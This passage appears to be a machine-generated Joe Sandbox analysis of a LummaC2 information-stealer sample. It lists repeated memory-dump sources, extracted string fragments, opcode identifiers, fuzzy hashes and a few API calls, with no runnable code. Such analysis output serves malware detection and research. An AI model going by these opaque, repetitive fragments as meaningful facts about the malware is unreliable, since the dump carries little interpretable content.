                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )Z(X$:\Z|$EB
                                              • API String ID: 0-2196627806
                                              • Opcode ID: 5931074c1617d487239f2ad9eeec10c7dbee895d16087f0cf93098e3c3bf3c4e
                                              • Instruction ID: 9cd8809df721bd65507024fb9a9329f049db45e05e6c7bad58157bd435f6071d
                                              • Opcode Fuzzy Hash: 5931074c1617d487239f2ad9eeec10c7dbee895d16087f0cf93098e3c3bf3c4e
                                              • Instruction Fuzzy Hash: AEC118B1A083109BD714DF24C8917ABB7E1EF95328F18952CF8C5A7385E374DA49C792
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8g$PG$~}
                                              • API String ID: 0-2796767324
                                              • Opcode ID: cd198da4b2671acfa6d4bf0c51129600960ee26de728bc4d4b0c3805fe8447f3
                                              • Instruction ID: 3c8b82f3b619a221f094b5e7df614d170ede9f349851636b01b4925f2af29c81
                                              • Opcode Fuzzy Hash: cd198da4b2671acfa6d4bf0c51129600960ee26de728bc4d4b0c3805fe8447f3
                                              • Instruction Fuzzy Hash: C8D1F37260C3548BD324CF64C8513BFBBE2ABC2314F49892DE9D59B381D779C90987A6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3P$C--1$FN
                                              • API String ID: 0-3627293634
                                              • Opcode ID: 06b06e813f9e9ee5381a06f4226ada9d5f4053fa313cefb0ada0cbdc4e13d419
                                              • Instruction ID: 32a51fa7f574c7de95aff6f1abd7e41eacd8ea770695ae16d2080adcf46dc07c
                                              • Opcode Fuzzy Hash: 06b06e813f9e9ee5381a06f4226ada9d5f4053fa313cefb0ada0cbdc4e13d419
                                              • Instruction Fuzzy Hash: 02B1297150C3D18BD3298F3594503ABFFE1AFE6308F184A9DD4C967381D7798A068B56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: <$a+$zak$^\
                                              • API String ID: 0-1385318057
                                              • Opcode ID: 003dfc2ba2f84d67ce1514e2c52676a3e514305f65fe2a53a2e7072cf45eadc8
                                              • Instruction ID: f1881eec5f59149967fda67e3f5766e50abc927b2659ee5e55297fb17297226d
                                              • Opcode Fuzzy Hash: 003dfc2ba2f84d67ce1514e2c52676a3e514305f65fe2a53a2e7072cf45eadc8
                                              • Instruction Fuzzy Hash: 5F8179729183518BC314CF28C8912A7BBE1FFD2324F099A1DE8D59B3A0D778C845CB92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: edg
                                              • API String ID: 0-1333089362
                                              • Opcode ID: 523d0cf75a97ae369541d19eb0c695c27870af779577db819036fd637ab2b896
                                              • Instruction ID: 553279c3b1a97d9cded832451c92e5b9bb0388480ccc79c13eadc9966f1c7ea2
                                              • Opcode Fuzzy Hash: 523d0cf75a97ae369541d19eb0c695c27870af779577db819036fd637ab2b896
                                              • Instruction Fuzzy Hash: 5B61067160C3449FE328CF6598517EFBBE5EBC5304F00893DEAA5AB281D7B59405CB92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: V0V6$f8]>
                                              • API String ID: 0-1051389075
                                              • Opcode ID: db6cda5e330f720e978176ca98e9831b0a4e92ac6a3e4740caa82fb67e6aa58b
                                              • Instruction ID: 52b0707a8560ba2816904f3d6dc0dfe5c65e194f36cee94a87efb67860992a4a
                                              • Opcode Fuzzy Hash: db6cda5e330f720e978176ca98e9831b0a4e92ac6a3e4740caa82fb67e6aa58b
                                              • Instruction Fuzzy Hash: 7D82DF70204601DFD728CF29D895B22BBF2FF4A318F18969CD496AB3E5D734A895CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0$8
                                              • API String ID: 0-46163386
                                              • Opcode ID: afbba03356a5abb5a6888a5096740e8d5c2235183f7c4e652aa1a3d75aa3bdbd
                                              • Instruction ID: b8f8f27b76c9609aae15f2f49f571249c0ed38fd2a6329787cbe2ac6f902c231
                                              • Opcode Fuzzy Hash: afbba03356a5abb5a6888a5096740e8d5c2235183f7c4e652aa1a3d75aa3bdbd
                                              • Instruction Fuzzy Hash: 727277715083449FD710CF18D880BABBBE1BF88314F19891DFA898B392D775D958CBA2
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00E16F18
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00E16FA9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID:
                                              • API String ID: 237503144-0
                                              • Opcode ID: b0f2cf7883f4c49c030c21f407f576c7ca9f636b010c217b45d5ba69ab17e0b2
                                              • Instruction ID: c8f5ff33488e021cb8178d9cc5d0de29182a50421d2630c6df210cb2b403f293
                                              • Opcode Fuzzy Hash: b0f2cf7883f4c49c030c21f407f576c7ca9f636b010c217b45d5ba69ab17e0b2
                                              • Instruction Fuzzy Hash: 7371F271608354DFE714CF64E89075FBBF5EB85704F00892CFAA5AB280D7B19909CB92
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00E1B3D2
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00E1B46C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID:
                                              • API String ID: 237503144-0
                                              • Opcode ID: e02508444eeaf1a51e8fd7a7e27b0101f31927c889d05329da1bc170d2f9f30d
                                              • Instruction ID: c6f65dcc657533f83c7ce8628ffaa272055b1048cb32000eb82a9ce64730ea22
                                              • Opcode Fuzzy Hash: e02508444eeaf1a51e8fd7a7e27b0101f31927c889d05329da1bc170d2f9f30d
                                              • Instruction Fuzzy Hash: AA8105B1608344DFD7248F55D8457ABBBE6FFC4308F44492DF589AB381EB7198498B82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: -*$52
                                              • API String ID: 0-1700671224
                                              • Opcode ID: 1aeb43864a207e083c091015236e2e571862a0885dd352195e72154ee43703ad
                                              • Instruction ID: 43405236e7060afc30e1109633ea4af83d205994f0aaee9305d8883d467f7bc5
                                              • Opcode Fuzzy Hash: 1aeb43864a207e083c091015236e2e571862a0885dd352195e72154ee43703ad
                                              • Instruction Fuzzy Hash: 0312FC7260C3508BD314CF69C85166BBBF2EFC5318F08992CE4D99B391E7798949CB92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ctqv$ctqv
                                              • API String ID: 0-4260466429
                                              • Opcode ID: b1c0750ab5d31633cbac383ac1bf7f4a978079622842c4ce3dbac7e17510fa65
                                              • Instruction ID: 4132786d68b5ae6ddabaa2e2ede403e63e22a616ff87a8cf263244a17972a294
                                              • Opcode Fuzzy Hash: b1c0750ab5d31633cbac383ac1bf7f4a978079622842c4ce3dbac7e17510fa65
                                              • Instruction Fuzzy Hash: 2E22EEB050D3808FD7108F28D8557ABBBE1EFC6308F18496CE6C59B252E779D949CB92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: '%<z$9%<z
                                              • API String ID: 0-816983374
                                              • Opcode ID: af8ddccf8c26b2fff36be1d8c7a3fe6f937ff20402170e2e568d7ce4ba8dcc19
                                              • Instruction ID: ba2cc8ebc3e98ba6f05747e6536c428dfd2bc0587ff17f701df22b8ddc8fce2c
                                              • Opcode Fuzzy Hash: af8ddccf8c26b2fff36be1d8c7a3fe6f937ff20402170e2e568d7ce4ba8dcc19
                                              • Instruction Fuzzy Hash: 75D116B2A087158FD718DF29DC5177AB7D2ABC4310F4A863CE9969B381EB74DC058782
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3P$FN
                                              • API String ID: 0-3819786433
                                              • Opcode ID: 4344248c456039b5fc4d5f2ad469279c2821337d3bd4fcd642226cbede9280cc
                                              • Instruction ID: 075f0edc0eacc3b432956632f903194f7d1f845f3846eacc87346f38324ba469
                                              • Opcode Fuzzy Hash: 4344248c456039b5fc4d5f2ad469279c2821337d3bd4fcd642226cbede9280cc
                                              • Instruction Fuzzy Hash: B191E57050C3D18BD3298B3994503EBBFE1AFE6308F189A9DD4C9A7282D7758606CB56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3P$FN
                                              • API String ID: 0-3819786433
                                              • Opcode ID: e9ccd72ae58924d6e0e7115a04bacfbe23370597922eec27f717841a2296b211
                                              • Instruction ID: 9271600ce291762013457502bb32dab5f009a99df1c19e671ef76a48f9f79794
                                              • Opcode Fuzzy Hash: e9ccd72ae58924d6e0e7115a04bacfbe23370597922eec27f717841a2296b211
                                              • Instruction Fuzzy Hash: FE91057050C3D18BD3298F3994503EBBFE1AFE6308F189A9DD4C9A7282D7758606CB56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4ijk$l1~3
                                              • API String ID: 0-2045880676
                                              • Opcode ID: f9a3fb7a4dd4de540f83080ccae53739c4184bb4dcef3c309818d822e973897a
                                              • Instruction ID: 304f008eefbf76b90eaf7ee108074e07110a079f7d8d4ac5264bbdad22aa2d69
                                              • Opcode Fuzzy Hash: f9a3fb7a4dd4de540f83080ccae53739c4184bb4dcef3c309818d822e973897a
                                              • Instruction Fuzzy Hash: C581E0B01183008BE714CF24C8557ABBBE1EFD1358F08992DF5C59B281EB79C949CB56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PQ$yz{
                                              • API String ID: 0-3852431821
                                              • Opcode ID: 8f0e22da3b45c66ced7ce6c0aa0b4289ff0481cd585999bfe09622a77fdaa648
                                              • Instruction ID: d06bc1ba812d0c580ebe629e8ccc747902b678f2a8fa29c74807753fcea499c5
                                              • Opcode Fuzzy Hash: 8f0e22da3b45c66ced7ce6c0aa0b4289ff0481cd585999bfe09622a77fdaa648
                                              • Instruction Fuzzy Hash: 1A81EDB15093408BD7208F19E8417ABBBE1FFC2368F185A2CE5D96B351E7798505CB93
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: gfff$gfff
                                              • API String ID: 0-3084402119
                                              • Opcode ID: 5024123e425171fc9af67a0283b3c3ad969dc3ed8bb154d66441bf7189e69ac2
                                              • Instruction ID: 7abb5575e58e9ba71ec1bc2ce6ebc616d1d945cf55becf6c8a7bfe101a67233b
                                              • Opcode Fuzzy Hash: 5024123e425171fc9af67a0283b3c3ad969dc3ed8bb154d66441bf7189e69ac2
                                              • Instruction Fuzzy Hash: 0471C1727206018FD71C8B2ACC6676676D3ABD4328F1DC26DD016DB3E5EB79E8468B40
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: +=Hz$S=Hz
                                              • API String ID: 0-1812093345
                                              • Opcode ID: f49dd5f970a8a68168d046de354e1d30f6f0ebfd7ba31c58a872c1363bb9af9d
                                              • Instruction ID: 35205cdd79309e9542f75f6ed9ed8dad401edd555fc6751bcbd170c00663c8b6
                                              • Opcode Fuzzy Hash: f49dd5f970a8a68168d046de354e1d30f6f0ebfd7ba31c58a872c1363bb9af9d
                                              • Instruction Fuzzy Hash: 26617A32A483418BD738CA24C9613FBB7D1DF90310F989A2DCADA673C1DB349549D782
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HG$u
                                              • API String ID: 0-3686158494
                                              • Opcode ID: f915f0dd6a18c20bfe5ba49134b2524b1f56a12a7db7fd6f7cc062178beff2b1
                                              • Instruction ID: 6adefc1e1a1be339e804532fc6abde445d88c94a9771f58d5451153eb69783c2
                                              • Opcode Fuzzy Hash: f915f0dd6a18c20bfe5ba49134b2524b1f56a12a7db7fd6f7cc062178beff2b1
                                              • Instruction Fuzzy Hash: 157145716083408FC318DF29C8907AABBE2AFC5314F59CA6CF5D69B2E1D7349944CB52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: NP,?
                                              • API String ID: 0-3110377521
                                              • Opcode ID: c7379d1ae1bf1e66a5ea2acabea78b35cca8c6e595ed94c31a44adf2b2dfb720
                                              • Instruction ID: f0869b37610a56a014c20fa410783b5e3bd4a407a85ff4de9b90848e4ce5f10d
                                              • Opcode Fuzzy Hash: c7379d1ae1bf1e66a5ea2acabea78b35cca8c6e595ed94c31a44adf2b2dfb720
                                              • Instruction Fuzzy Hash: 6A424172608204DFD7149F29DC5A73B77E1EF85328F58562CF882AB2E1E7749848CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ..
                                              • API String ID: 0-870355071
                                              • Opcode ID: e7dc4851570d38a63dbf8571da1df6f29332732a897cf7892ec9a5d41367aec1
                                              • Instruction ID: 65f1cc016acc1e42eabfabe4be295b292b922ae9e252d214dbf7f7de32a10adb
                                              • Opcode Fuzzy Hash: e7dc4851570d38a63dbf8571da1df6f29332732a897cf7892ec9a5d41367aec1
                                              • Instruction Fuzzy Hash: EC421D36618322CBD7088F28E85536BB7E2EF85310F09D97DE49697290E778D949C782
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
